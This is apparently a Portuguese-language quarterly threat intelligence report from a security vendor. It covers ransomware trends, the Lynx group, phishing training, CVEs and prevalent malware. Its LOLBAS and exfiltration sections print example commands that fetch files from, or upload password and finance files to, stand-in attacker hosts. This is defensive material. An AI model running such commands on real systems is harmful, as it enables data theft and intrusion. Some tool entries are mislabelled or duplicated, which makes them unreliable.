O ecossistema de ransomware evoluiu significativamente desde o primeiro ataque registrado em 1989, quando o cavalo de troia AIDS foi lançado. A evolução do ransomware foi gradual antes do surgimento da criptomoeda em 2010. A era do Bitcoin, no entanto, estimulou o rápido crescimento das ameaças cibernéticas, especialmente na última meia década.

Em 2019, grupos como MAZE, Ryuk e Sodinokibi/REvil estavam causando estragos ao criptografar sistemas e redes de computadores e exigir pagamentos por chaves de descriptografia. Essa era uma estratégia de ataque eficaz na época, pois poucas organizações mantinham backups de sistemas e menos ainda tinham planos de resposta a incidentes cibernéticos.

 

A ameaça de ransomware em constante evolução

Durante esse período, as operações de ransomware eram vistas como grupos tradicionais do crime organizado: criminosos cibernéticos habilidosos que se uniam por uma causa ou objetivo comum. Desde então, os grupos de ransomware se tornaram adversários muito adaptáveis e, à medida que as práticas de segurança cibernética melhoraram, o mesmo aconteceu com as táticas, técnicas e procedimentos (TTPs) dos operadores de ransomware.

Para garantir ganhos financeiros, os grupos de ransomware passaram da extorsão simples (somente criptografia de dados) para táticas de extorsão dupla, exigindo pagamentos de resgate pela chave de descriptografia e, além disso, para evitar que os dados roubados sejam vendidos na dark web.

O número de operações de ransomware também aumentou de forma constante, com grupos antigos mudando de marca, novos grupos entrando no ecossistema e novos modelos de negócios surgindo. O ransomware como serviço (RaaS), bem como métodos de criptografia mais rápidos, melhores técnicas de ofuscação e a capacidade de atingir vários sistemas operacionais, são alguns dos avanços notáveis nos últimos anos.

Embora algumas operações de ransomware continuem a criptografar arquivos e sistemas, outras optaram por renunciar a essa etapa e passar para um modelo somente de exfiltração. Essa mudança de abordagem é provavelmente uma resposta à adoção de melhores práticas de segurança cibernética e ao aumento do uso de backups de sistemas e serviços de recuperação de desastres.

Um terceiro elemento da extorsão

Mais recentemente, as operações de ransomware acrescentaram um terceiro elemento de extorsão. Em vez de apenas exfiltrar os dados e ameaçar publicá-los on-line, algumas operações de ransomware estão dedicando tempo para analisar os dados roubados e transformá-los em armas para aumentar a pressão sobre as vítimas que se recusam a pagar. Essa estratégia pode envolver o compartilhamento de detalhes de contato ou o doxing de membros da família de CEOs e proprietários de empresas visados, bem como a ameaça de relatar às autoridades quaisquer informações sobre atividades comerciais ilegais descobertas nos dados roubados. Os operadores de ransomware podem ameaçar entrar em contato com clientes ou consumidores, ou pior, lançar ataques adicionais se os pedidos de resgate não forem atendidos.

Além disso, o NC3 observou o surgimento de um número considerável de novas variantes de ransomware. O ecossistema de ransomware parece compreender grupos heterogêneos de indivíduos com conjuntos de habilidades que variam de engenharia social, intermediação de acesso inicial, criptografia avançada, desenvolvimento de malware, negociação e até mesmo relações públicas. O ecossistema de ransomware é uma complicada rede interconectada. O combate às operações de ransomware exige uma abordagem igualmente complexa e multidisciplinar.

Desafios da aplicação da lei

Para as autoridades policiais, a evolução contínua no espaço do ransomware representa um desafio considerável que exige soluções inovadoras. O ransomware é uma das principais ameaças globais e provavelmente persistirá enquanto as vítimas continuarem pagando.

Com base em repressões anteriores das autoridades policiais contra grupos de ransomware de alto perfil, como Hive, BlackCat e LockBit, sabemos que os agentes de ransomware podem adaptar rapidamente suas táticas para frustrar os esforços das autoridades policiais. Esses esforços adaptativos fragmentaram o ecossistema de ransomware, forçando a aplicação da lei a adotar estratégias multifacetadas que incluem métodos criativos para interromper as operações (por exemplo, visando à infraestrutura, à reputação e à confiança).

As 10 principais ameaças canadenses de ransomware

O NC3 trabalha em estreita colaboração com as forças policiais nacionais e internacionais, parceiros governamentais, setor privado e universidades para melhorar continuamente a resposta das forças policiais canadenses ao crime cibernético. Além de contribuir e apoiar operações específicas de aplicação da lei contra crimes cibernéticos, o Centro Nacional de Coordenação de Crimes Cibernéticos monitora rotineiramente a evolução do cenário de ameaças cibernéticas e realiza uma avaliação trienal dos operadores de ransomware que visam o Canadá. Essa avaliação sistemática informa o setor de segurança cibernética sobre as mudanças no ecossistema do crime cibernético, além de ajudar a direcionar os recursos de investigação.

A tabela abaixo rastreia as ameaças de ransomware mais prevalentes no Canadá para o período de relatório de maio a agosto de 2024, que se sobrepõe ao período coberto por este relatório.

Figura 8: ameaças canadenses de ransomware, maio a agosto de 2024.
Figura 8: ameaças canadenses de ransomware, maio a agosto de 2024.

Grupo emergente em destaque - Lynx Ransomware

O grupo de ransomware Lynx apareceu pela primeira vez no cenário de ameaças em julho de 2024 e rapidamente acumulou mais de 25 vítimas nos meses seguintes. As organizações visadas estavam divididas em uma ampla gama de setores e localizadas principalmente na América do Norte e na Europa.

O que é o Lynx Group?

O grupo Lynx, como muitos operadores de ransomware atuais, usa uma estratégia de dupla extorsão. Depois de acessar ilegalmente um sistema ou uma rede, eles primeiro exfiltram dados confidenciais antes de criptografá-los, tornando-os inacessíveis ao proprietário. Em seguida, eles ameaçam divulgar publicamente os dados se o resgate não for pago. Quando uma organização é violada pelo Lynx, o grupo publica uma postagem em um blog em um site de vazamento - acessível pela Internet pública ou pela dark web, ou às vezes por ambas - "nomeando e envergonhando" a vítima.

Figura 9: Captura de tela do site de vazamento da dark web Lynx.
Figura 9: Captura de tela do site de vazamento da dark web Lynx.
Os dados roubados podem ser ainda mais aproveitados pelo grupo em negociações de resgate, com a ameaça de publicação de mais informações se a vítima não atender a pedidos de resgate adicionais.

Setores e regiões visados pelo Lynx

Nas imagens abaixo, você pode ver as áreas e os setores em que o Lynx é mais predominante. O Lynx tem como alvo principal as organizações norte-americanas e australianas, mas também o Reino Unido e partes da Europa
Setores e regiões visados pelo Lynx
Figura 10: Distribuição geográfica das vítimas do Lynx.
Figura 11: Principais setores visados pelo Lynx.

Como o Lynx opera

O Lynx mantém um site de superfície e um site de vazamento na deep web, juntamente com uma série de sites espelhados localizados em endereços ".onion" - presumivelmente para garantir o tempo de atividade caso algum de seus sites seja retirado do ar pelas autoridades policiais. Eles também empregam seu próprio criptografador que, após um exame mais detalhado pelos pesquisadores da BlackBerry, parece ter sido desenvolvido a partir da mesma base de código usada pelo infame grupo INC Ransom.

Até o momento, foram identificadas na natureza algumas amostras relacionadas ao criptografador utilizado pelo grupo Lynx. Todas as amostras parecem ter sido escritas em C++ e não possuem nenhuma forma de empacotamento ou ofuscação para impedir a análise.

Uma vez que os objetivos de pré-criptografia, como a obtenção de acesso inicial e a exfiltração de dados, tenham sido realizados, o ransomware é implantado no ambiente da vítima. O próprio ransomware foi projetado para ser executado por meio do console de linha de comando, com suporte a vários argumentos opcionais. Isso permite que um invasor personalize sua abordagem de criptografia de arquivos para atingir seus objetivos.

Após a execução, o malware também oferece suporte ao modo "--verbose", que imprimirá uma lista de operações que o ransomware está realizando enquanto é executado dinamicamente.

Como o Lynx opera
Figura 12: Criptografador Lynx em execução no modo detalhado.

Para evitar que o dispositivo da vítima fique inoperante, o malware omite certos tipos de arquivos e pastas do Windows da criptografia. Isso serve a um propósito de uso duplo, acelerando a criptografia e evitando que programas essenciais do Windows se tornem inacessíveis, o que "bloquearia" o dispositivo e arruinaria a chance do grupo de pedir um resgate.

Para obter uma análise mais detalhada dessa ameaça emergente, leia nosso relatório completo sobre o Lynx.

Medidas de segurança operacional

O treinamento regular de conscientização sobre segurança é fundamental para cultivar uma cultura organizacional vigilante. Tópicos como prevenção de phishing, segurança de credenciais e segurança de acesso remoto devem ser enfatizados.

  • Tática: implemente um programa de treinamento "Spot the Red Flag" no qual os funcionários recebem e-mails simulados de phishing contendo elementos enganosos comuns, seguidos de feedback educacional imediato explicando cada indicador suspeito. Acompanhe as taxas de resposta dos funcionários e ofereça treinamento de acompanhamento direcionado com base em métricas de desempenho individual.
  • Exemplo: Um varejista internacional reduz significativamente seus incidentes de phishing ao lançar um programa de treinamento abrangente, aliado a um sistema robusto de gerenciamento de patches para resolver as vulnerabilidades imediatamente.
  • Basta que um funcionário clique em um link malicioso para comprometer os sistemas e a infraestrutura de uma organização. Aqui está um exemplo de mensagem de phishing para incorporar em seu treinamento.
Figura 13a: Solicitação de conexão típica que um funcionário pode receber.
Figura 13a: Solicitação de conexão típica que um funcionário pode receber.
No entanto, um olhar mais atento revela as características típicas de um e-mail de phishing (Figura 13b):
Figura 13b: Sinais de alerta a serem observados em um e-mail de phishing.
Figura 13b: Sinais de alerta a serem observados em um e-mail de phishing.
  1. O endereço de e-mail do remetente alega ser de "linkedincdn.com" em vez do domínio oficial do LinkedIn.com - essa é uma técnica clássica de falsificação de domínio.
  2. Há um banner de aviso indicando que a mensagem é de uma fonte externa. Esse é um recurso de segurança útil que muitas organizações optam por implementar.
  3. A mensagem usa duas táticas clássicas de engenharia social. Ela afirma ser de um executivo de alto nível (CISO) da organização do alvo e usa lisonjas ("ouvi falar muito bem de você") para incentivar o envolvimento.
  4. A cópia contém formatação inconsistente: irregularidades de ortografia e gramática podem ser encontradas em todo o texto.
  5. Embora a foto do perfil pareça genuína, elas podem ser facilmente copiadas de um perfil legítimo por qualquer pessoa que saiba clicar com o botão direito do mouse e selecionar "Salvar imagem como".
  6. A aparência geral do e-mail imita mensagens automatizadas comuns enviadas por e-mail aos usuários por sites de mídia social.
    • Os botões "Accept" (Aceitar) e "View Profile" (Exibir perfil) provavelmente são links maliciosos que podem levar a páginas de coleta de credenciais ou downloads de malware.
    • O link "Unsubscribe" (Cancelar assinatura) na parte inferior também pode ser malicioso. Os phishers geralmente incluem esses links para parecerem legítimos, mas na verdade levam os usuários a conteúdos mais prejudiciais.

Ajude seus funcionários a aprender a:

  • Verifique cuidadosamente os domínios de e-mail do remetente.
  • Desconfie de solicitações de conexão não solicitadas, principalmente de executivos de alto escalão.
  • Nunca clique em botões ou links em e-mails suspeitos - em vez disso, eles devem visitar o site referenciado digitando o URL diretamente no navegador.
  • Preste atenção aos avisos de segurança de seu sistema de e-mail.
  • Desconfie de bajulação ou urgência em solicitações inesperadas de contatos profissionais.

Os criminosos cibernéticos refinam continuamente seus ataques cibernéticos para aumentar seu impacto. Para se defender contra essas ameaças em evolução, as organizações devem adotar uma abordagem voltada para o futuro nas estratégias de defesa da segurança cibernética. Isso inclui investir estrategicamente em tecnologias, como monitoramento de segurança, treinamento de pessoal e resposta a incidentes, para garantir que estejam preparadas para ameaças cibernéticas sofisticadas.

Destaque da história cibernética: Trojan bancário Coyote tem como alvo a América Latina, com foco em instituições financeiras brasileiras

Em julho de 2024, pesquisadores da BlackBerry descobriram uma campanha na qual o Coyote foi implantado para atingir bancos brasileiros e bolsas de criptomoedas. A tendência crescente de cavalos de Troia bancários direcionados geograficamente enfatiza a necessidade de segurança cibernética robusta e educação do usuário para combater ameaças de phishing e engenharia social como o Coyote. Na seção Mitigações deste relatório, você encontrará outras ideias de segurança acionáveis para compartilhar com a sua organização.

CylanceMDR: Ameaças e mitigações

As organizações enfrentam ameaças não apenas do malware dos agentes de ameaças, mas também do uso indevido de ferramentas legítimas. Esta seção destaca as ameaças mais prevalentes que a equipe do CylanceMDR™ encontrou nos ambientes de rede dos clientes neste trimestre, bem como as atenuações que as organizações podem usar para fortalecer suas defesas cibernéticas.

CylanceMDR é o nosso serviço de MDR baseado em assinatura que oferece monitoramento 24 horas por dia, 7 dias por semana, e ajuda as organizações a impedir ameaças cibernéticas sofisticadas, preenchendo lacunas nos ambientes de segurança.

Atividade LOLBAS

Atividade LOLBAS

LOLBAS refere-se a ferramentas integradas do sistema Windows e a executáveis legítimos que os atacantes podem usar para fins mal-intencionados. O termo "viver da terra" significa usar ferramentas que já estão presentes no ambiente-alvo ("a terra"), em vez de correr o risco de introduzir um novo malware que possa acionar os sistemas de segurança e alertar o alvo sobre o fato de que ele foi comprometido. O perigo dos ataques baseados em LOLBAS está na sua capacidade de contornar os controles de segurança, pois eles usam ferramentas legítimas do sistema. Isso torna a detecção um desafio, pois as atividades do sistema podem parecer normais à primeira vista.

Durante o período do relatório, foram observadas as seguintes atividades do LOLBAS:

  • O Bitsadmin continua sendo o LOLBAS mais observado.
  • O Certutil é o segundo mais observado, embora seu uso tenha diminuído desde o último período do relatório.
  • Regsvr32, MSHTA e PsExec também foram observados, mas representam uma baixa porcentagem da atividade geral.

Abaixo, ilustramos um exemplo de uso mal-intencionado do LOLBAS.

Figura 14: Atividade do LOLBAS, julho a setembro de 2024.

Arquivo: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

Arquivo: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Ferramentas de exfiltração

Ferramentas de exfiltração

As ferramentas de exfiltração são softwares usados para transferir dados para fora de um ambiente-alvo, geralmente para fins maliciosos. Neste trimestre, a equipe do CylanceMDR analisou as ferramentas mais comuns que poderiam ser usadas para exfiltração (sem incluir as ferramentas de RMM) nos ambientes de nossos clientes.

Figura 15: porcentagem de ferramentas de exfiltração abusadas, julho a setembro de 2024.

WinSCP

Descrição: O WinSCP é um cliente de transferência de arquivos; o PuTTY é um cliente de shell seguro (SSH).

Exemplo de linha de comando: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Observação: comumente usado com uma interface gráfica do usuário (GUI).

MITRE ATT&CK ID: T1048

PSCP

Descrição: O PuTTY Secure Copy Protocol (PSCP) é um utilitário de linha de comando usado para transferir arquivos e pastas.

Exemplo de linha de comando: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

FileZilla

Descrição: O FileZilla é uma ferramenta conhecida de protocolo de transferência de arquivos (FTP) que pode ser usada em vários sistemas operacionais.

Exemplo de linha de comando: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

MITRE ATT&CK ID: T1071.002

FreeFileSync

Descrição: O PuTTY Secure Copy Protocol (PSCP) é um utilitário de linha de comando usado para transferir arquivos e pastas.

Exemplo de linha de comando: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

Rclone

Descrição: O FreeFileSync é uma ferramenta de sincronização que pode ser usada para gerenciar backups.

Exemplo de linha de comando: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

MITRE ATT&CK ID: T1567.002

Ferramentas de monitoramento e gerenciamento remoto

Ferramentas de monitoramento e gerenciamento remoto

Os agentes de ameaças abusam das ferramentas de RMM. Essas ferramentas oferecem aos atacantes uma maneira fácil de manter um acesso simples e persistente aos sistemas e um meio eficiente de exfiltração de dados. Conforme observado em nosso Relatório de Inteligência sobre Ameaças Globais anterior, essa é a categoria de crescimento mais rápido para grupos de ransomware que usam essas ferramentas para extrair dados dos ambientes das vítimas. Durante esse período do relatório, a equipe do CylanceMDR analisou as ferramentas de RMM mais comumente exploradas nos ambientes de nossos clientes.

Durante nossa análise, observamos que muitos clientes usam várias ferramentas de RMM em seus ambientes, aumentando a superfície de ataque e o risco da organização.

Figura 16: Este gráfico ilustra a porcentagem de ataques executados por meio do abuso das principais ferramentas de RMM.

 

As mitigações sugeridas incluem:

1. Auditoria de ferramentas de acesso remoto

  • Identificar as ferramentas de RMM usadas atualmente na organização.
  • Confirme se eles são aprovados no ambiente.
  • Se estiver usando várias ferramentas de RMM, determine se elas podem ser consolidadas. A redução do número de diferentes ferramentas utilizadas reduz o risco.

2. Desativar portas e protocolos

  • Bloqueie a comunicação de rede de entrada e saída para portas comumente usadas associadas a ferramentas de acesso remoto não aprovadas.
  • Use regras padrão de negação e listagem de permissão em vez de uma abordagem de lista de bloqueio quando se trata de regras de firewall e controle de aplicativos.

3. Monitore a atividade do endpoint e o tráfego da rede

  • Detectar o uso anormal de ferramentas de acesso remoto.

4. Patching

  • Garantir a revisão regular das vulnerabilidades associadas às ferramentas RMM permitidas utilizadas, atualizando-as conforme necessário.
  • Priorize os sistemas acessíveis pela Internet ao realizar ciclos regulares de patches.

5. Segmentação de rede

  • Minimize o movimento lateral malicioso segmentando a rede e limitando o acesso a dispositivos e dados.

6. Marcação de dispositivos

  • Descubra se o seu fornecedor de segurança oferece opções para marcar dispositivos que usam ferramentas de RMM. Em caso afirmativo, ative essa opção para garantir que seu SOC tenha visibilidade. Alguns fornecedores oferecem opções para deixar uma nota/etiqueta identificando as ferramentas/atividades aprovadas, o que ajuda muito os analistas durante as investigações.

7. RMM com carregamento de memória

  • Use um software de segurança que possa detectar o acesso remoto que é carregado somente na memória.

CylanceMDR Principais ameaças trimestrais

As ameaças mais prevalentes detectadas e respondidas pela equipe de analistas do CylanceMDR durante o período do relatório estão listadas abaixo.
Figura 17: Ameaças mais prevalentes detectadas e respondidas pela equipe de analistas do CylanceMDR neste trimestre.
Figura 17: Ameaças mais prevalentes detectadas e respondidas pela equipe de analistas do CylanceMDR neste trimestre.

Destaque: Alertas da equipe de resposta a incidentes da BlackBerry

Aequipe de Resposta a Incidentes (IR) do BlackBerry oferece mitigação para organizações que sofreram um ataque de malware ou suspeita de violação de dados. Durante este trimestre, nossa equipe de IR testemunhou um aumento nos ataques envolvendo serviços conectados à Internet e abuso de credenciais de ex-funcionários.

Os dispositivos voltados para a Internet, como os dispositivos VPN, foram mais visados do que o normal neste trimestre. Infelizmente, esses tipos de dispositivos podem não estar suficientemente protegidos com autenticação multifator. Em alguns casos, essa falta de MFA permitiu que os agentes de ameaças implantassem ransomware ou outro malware no ambiente de um cliente e exfiltrassem os dados da empresa. Isso destaca a necessidade de as empresas protegerem adequadamente todos os sistemas expostos à Internet em tempo hábil(MITRE - External Remote Services) e reduzirem a superfície de ataque quando possível, usando alternativas modernas como as soluções Zero Trust Network Access (ZTNA).

O abuso de credenciais de contas de ex-funcionários é outra exploração comum. Embora as credenciais dos funcionários devam ser desprovisionadas assim que o funcionário deixa a empresa, isso nem sempre acontece. Contas antigas podem, potencialmente, dar a um agente de ameaças acesso total à rede e aos sistemas da organização. Isso enfatiza a necessidade de as empresas implementarem fortes controles de segurança de autenticação em todos os sistemas(MITRE - Valid Accounts).

Vulnerabilidades e exposições comuns

Impacto e estatísticas

O sistema Common Vulnerabilities and Exposures (CVEs) oferece uma estrutura para identificar, padronizar e divulgar vulnerabilidades e exposições de segurança conhecidas. De julho a setembro de 2024, o Instituto Nacional de Padrões e Tecnologia (NIST) relatou 8.659 novos CVEs.

Embora menos CVEs tenham sido descobertos neste trimestre em comparação com o anterior, o nível de criticidade desses CVEs aumentou significativamente. No último trimestre, 8% dos CVEs tiveram uma pontuação de gravidade de 9,0 ou superior, enquanto neste trimestre a porcentagem subiu para um novo recorde de 14%.

Figura 18: Pontuação CVE de julho a setembro de 2024.

Os CVEs mais críticos registrados neste trimestre:

CVE-2024-4879 (9.3 Crítico) Execução de código arbitrário: Essa vulnerabilidade do ServiceNow permite que usuários não autenticados executem remotamente códigos dentro da plataforma Now. Ela envolve uma vulnerabilidade de injeção de modelo Jelly queexplora as macros da interface do usuário do ServiceNow. Essa vulnerabilidade pode ser potencialmente encadeada com CVE-2024-5178 (6.9 Média) Acesso não autorizado e CVE-2024-5217 (9.2 Crítica) Execução de código arbitrário, permitindo a execução remota não autorizada de código nos servidores ServiceNow MID.

CVE-2024-43491 (9.8 Crítico) Execução de código arbitrário: Pertencente à pilha de serviços da Microsoft, essa vulnerabilidade reintroduz vulnerabilidades anteriormente atenuadas no Windows 10. Ela permite a execução remota de código sem a interação do usuário, podendo levar ao comprometimento total do sistema. Uma atualização do Service Stack e uma atualização de segurança do Windows foram lançadas para corrigir essa vulnerabilidade.

CVE-2024-38194 (9.9 Crítico) Contorno de autenticação: Essa vulnerabilidade decorre de uma autorização inadequada nos aplicativos Web do Azure, permitindo que um invasor autenticado eleve os privilégios em uma rede. Se explorada, ela pode comprometer a segurança dos aplicativos e dos sistemas conectados, levando ao acesso não autorizado aos dados, à interrupção do serviço ou à modificação maliciosa do comportamento do aplicativo.

CVE-2024-21416 (9.8 Crítico) Execução de código arbitrário: Relacionada a uma vulnerabilidade de execução remota de código (RCE) do Windows TCP/IP, essa exploração pode permitir que os invasores executem códigos arbitrários no sistema de destino, potencialmente obtendo acesso total.

Contorno de autenticação CVE-2024-47575 (9.8 Crítico): Divulgado logo após o período do relatório, o exploit conhecido como "FortiJump" e rastreado como CVE-2024-47575 envolve ataques de dia zero pelo recém-divulgado agente de ameaças UNC5820. Ele abusa de uma falha para executar comandos de API, permitindo que os invasores contornem a autenticação e executem comandos em sistemas exploráveis. O comunicado de outubro da Fortinet declarou que essa vulnerabilidade "pode permitir que um invasor remoto não autenticado execute códigos ou comandos arbitrários por meio de solicitações especialmente criadas".

Ameaças predominantes por plataforma: Windows

FakeUpdates/SocGholish

Downloader

Downloader baseado em JavaScript que apresenta falsas atualizações de navegador aos usuários. Conhecido por baixar cargas úteis adicionais, incluindo AZORult, GootLoader e RedLine.

Formbook/xLoader

Infostealer    

Malware sofisticado que opera como infostealer e downloader. Emprega técnicas anti-VM, injeção de processos e rotinas de criptografia personalizadas para contornar as defesas de segurança cibernética. Rouba dados de navegadores, clientes de e-mail e vários aplicativos.

QakBot

Botnet/Dropper

Descoberto pela primeira vez em 2008, agora na versão 5.0. Oferece amplos recursos para exfiltração de dados e movimentação lateral. Conhecido por fornecer vários tipos de malware após a instalação.

Agente Tesla

Infostealer

Infostealer baseado em .NET vendido como MaaS usado principalmente para coleta de credenciais. Apesar de uma derrubada da infraestrutura do FBI/DOJ em 2023, ele ressurgiu com novos mecanismos de persistência para sobreviver à restauração do host.

njRAT

Trojan de acesso remoto

O RAT concentrou-se na captura de dados do usuário, com recursos que incluem acesso à câmera, roubo de credenciais, monitoramento de interação de arquivos e registro de teclas.

AsyncRAT

Trojan de acesso remoto

Normalmente é entregue junto com outros malwares. Recebe comandos do servidor C2 para capturar dados do usuário e encerrar processos específicos. Apresenta recursos de botnet.

LummaC2

Infostealer

Infostealer baseado em C que tem como alvo empresas comerciais e organizações de infraestrutura crítica. Concentra-se na exfiltração de dados confidenciais e é distribuído por meio de fóruns clandestinos e grupos do Telegram.

Remcos

Trojan de acesso remoto

Aplicativo de controle remoto e vigilância projetado para acesso remoto não autorizado e controle de dispositivos.

RedLine

Infostealer

Emprega vários aplicativos e serviços para exfiltrar dados da vítima, incluindo informações de cartão de crédito, senhas e cookies.

Phorpiex

Botnet

Botnet focado no fornecimento de malware, conhecido por seu envolvimento em campanhas de extorsão com classificação X.

Ameaças predominantes por plataforma: Linux

Mirai

Botnet

Permanece altamente ativo, com a versão mais recente explorando vulnerabilidades de dia zero em câmeras CCTV. A variante "Corona" se espalha por meio da injeção de código malicioso em câmeras comprometidas.

Gafgyt/Bashlite

Botnet

Botnet Linux focado em IoT usando servidores C2 para ataques DDoS em grande escala. A versão mais recente tem como alvo senhas SSH fracas para mineração de criptografia de GPU.

Reproduzir Ransomware

Ransomware

Nova variante direcionada especificamente a ambientes ESXi, marcando a primeira expansão do grupo para sistemas Linux a partir de seus ataques anteriores de extorsão dupla com foco no Windows. Criptografa seletivamente arquivos em ambientes Linux ESXi.

Hadooken

Botnet

Novo malware para Linux que combina recursos de mineração de criptografia com ferramentas de ataque DDoS. Tem como alvo vulnerabilidades em sistemas que incluem o Oracle WebLogic Server.

Ameaças predominantes por plataforma: macOS

Ladrão atômico (AMOS)

Infostealer

Novas variantes disfarçadas de vários aplicativos distribuídos por meio de imagens de disco DMG. Tem como alvo senhas, cookies de navegador, dados de preenchimento automático, carteiras de criptografia e dados de chaveiro do Mac.

Chtulu

Infostealer

Infostealer baseado em MaaS distribuído como um trojan DMG. As atividades pós-infecção incluem a coleta de senhas de chaveiro, cookies do navegador, informações da conta do Telegram, carteiras de criptomoedas e dados do usuário para upload no servidor C2.

Macma

Porta dos fundos

Atualizações recentes atribuídas ao grupo chinês APT Evasive Panda. Estabelece persistência antes de implantar keylogger e recursos de captura de mídia para exfiltração de dados para servidores C2.

TodoSwift

Downloader

Distribuído por meio de iscas de PDF com preços de Bitcoin. Atribuído ao grupo norte-coreano BlueNoroff e capaz de fazer download de binários mal-intencionados adicionais por meio de conexões com o servidor C2.

Ameaças predominantes por plataforma: Android

Necro Trojan

Downloader

Distribuído pela loja Google Play e por kits de desenvolvimento de software malicioso (SDKs). Os recursos incluem o lançamento de anúncios invisíveis, o download de cargas úteis adicionais, a instalação de aplicativos de terceiros, a execução de códigos adicionais e a comunicação com o servidor C2.

Octo2

Infostealer

Distribuído por meio de versões trojanizadas do NordVPN e do Google Chrome. Uma variante do Exobot que visa principalmente informações de contas bancárias com recursos de acesso remoto e comunicação com o servidor C2.

Ajina

Infostealer

Distribuído por meio de engenharia social e phishing, especialmente via Telegram. Rouba credenciais bancárias e dados de SMS para interceptar a autenticação 2FA de aplicativos bancários.

Técnicas comuns do MITRE

A compreensão das técnicas de alto nível dos grupos de ameaças pode ajudar a decidir quais técnicas de detecção devem ser priorizadas. A BlackBerry observou as seguintes 20 técnicas sendo usadas por agentes de ameaças no período do relatório.

Figura 19: 20 principais técnicas MITRE observadas, junho a setembro de 2024.

Técnicas detectadas

A tabela a seguir mostra as 20 principais técnicas usadas pelos agentes de ameaças neste trimestre. Uma seta para cima (↑) na coluna "Mudança" indica que o uso da técnica aumentou desde nosso último relatório. Uma seta para baixo (↓) indica que o uso diminuiu desde nosso último relatório. Um símbolo de igual (=) indica que a técnica permanece na mesma posição que em nosso último relatório.

Nome da técnica ID da técnica Nome da tática Último relatório Mudança
Fluxo de execução do Hijack
T1574
Persistência, escalonamento de privilégios, evasão de defesa
1
=
Carregamento lateral de DLL
T1574.002
Persistência, escalonamento de privilégios, evasão de defesa
2
=
Virtualização/
Evasão de sandbox
T1497
Evasão da defesa, descoberta
NA
Descoberta de informações do sistema
T1082
Descoberta
5
Captura de entrada
T1056
Acesso a credenciais, coleta
4
Descoberta de software
T1518
Descoberta
6
=
Descoberta de software de segurança
T1518.001
Descoberta
7
=
Tarefa agendada/trabalho
T1053
Execução, persistência, escalonamento de privilégios
19
Sequestro de ordem de pesquisa de DLL
T1574.001
Persistência, escalonamento de privilégios, evasão de defesa
NA
Injeção de processo
T1055
Evasão de defesa, escalonamento de privilégios
3
Mascaramento
T1036
Evasão da defesa
10
Descoberta de processos
T1057
Descoberta
8
Criar ou modificar o processo do sistema
T1543
Persistência, escalonamento de privilégios
NA
Serviço do Windows
T1543.003
Persistência, escalonamento de privilégios
NA
Execução do AutoStart de inicialização ou de logon
T1547
Persistência, escalonamento de privilégios
14
Chaves de execução do registro/Pasta de inicialização
T1547.001
Persistência, escalonamento de privilégios
15
Descoberta de arquivos e diretórios
T1083
Descoberta
9
Descoberta remota do sistema
T1018
Descoberta
13
Interpretador de comandos e scripts
T1059
Execução
NA
Impair Defesas
T1562
Evasão da defesa
17
ID da técnica
Fluxo de execução do Hijack
T1574
Carregamento lateral de DLL
T1574.002
Virtualização/
Evasão de sandbox
T1497
Descoberta de informações do sistema
T1082
Captura de entrada
T1056
Descoberta de software
T1518
Descoberta de software de segurança
T1518.001
Tarefa agendada/trabalho
T1053
Sequestro de ordem de pesquisa de DLL
T1574.001
Injeção de processo
T1055
Mascaramento
T1036
Descoberta de processos
T1057
Criar ou modificar o processo do sistema
T1543
Serviço do Windows
T1543.003
Execução do AutoStart de inicialização ou de logon
T1547
Chaves de execução do registro/Pasta de inicialização
T1547.001
Descoberta de arquivos e diretórios
T1083
Descoberta remota do sistema
T1018
Interpretador de comandos e scripts
T1059
Impair Defesas
T1562
Nome da tática
Fluxo de execução do Hijack
Persistência, escalonamento de privilégios, evasão de defesa
Carregamento lateral de DLL
Persistência, escalonamento de privilégios, evasão de defesa
Virtualização/
Evasão de sandbox
Evasão da defesa, descoberta
Descoberta de informações do sistema
Descoberta
Captura de entrada
Acesso a credenciais, coleta
Descoberta de software
Descoberta
Descoberta de software de segurança
Descoberta
Tarefa agendada/trabalho
Execução, persistência, escalonamento de privilégios
Sequestro de ordem de pesquisa de DLL
Persistência, escalonamento de privilégios, evasão de defesa
Injeção de processo
Evasão de defesa, escalonamento de privilégios
Mascaramento
Evasão da defesa
Descoberta de processos
Descoberta
Criar ou modificar o processo do sistema
Persistência, escalonamento de privilégios
Serviço do Windows
Persistência, escalonamento de privilégios
Execução do AutoStart de inicialização ou de logon
Persistência, escalonamento de privilégios
Chaves de execução do registro/Pasta de inicialização
Persistência, escalonamento de privilégios
Descoberta de arquivos e diretórios
Descoberta
Descoberta remota do sistema
Descoberta
Interpretador de comandos e scripts
Execução
Impair Defesas
Evasão da defesa
Último relatório
Fluxo de execução do Hijack
1
Carregamento lateral de DLL
2
Virtualização/
Evasão de sandbox
NA
Descoberta de informações do sistema
5
Captura de entrada
4
Descoberta de software
6
Descoberta de software de segurança
7
Tarefa agendada/trabalho
19
Sequestro de ordem de pesquisa de DLL
NA
Injeção de processo
3
Mascaramento
10
Descoberta de processos
8
Criar ou modificar o processo do sistema
NA
Serviço do Windows
NA
Execução do AutoStart de inicialização ou de logon
14
Chaves de execução do registro/Pasta de inicialização
15
Descoberta de arquivos e diretórios
9
Descoberta remota do sistema
13
Interpretador de comandos e scripts
NA
Impair Defesas
17
Mudança
Fluxo de execução do Hijack
=
Carregamento lateral de DLL
=
Virtualização/
Evasão de sandbox
Descoberta de informações do sistema
Captura de entrada
Descoberta de software
=
Descoberta de software de segurança
=
Tarefa agendada/trabalho
Sequestro de ordem de pesquisa de DLL
Injeção de processo
Mascaramento
Descoberta de processos
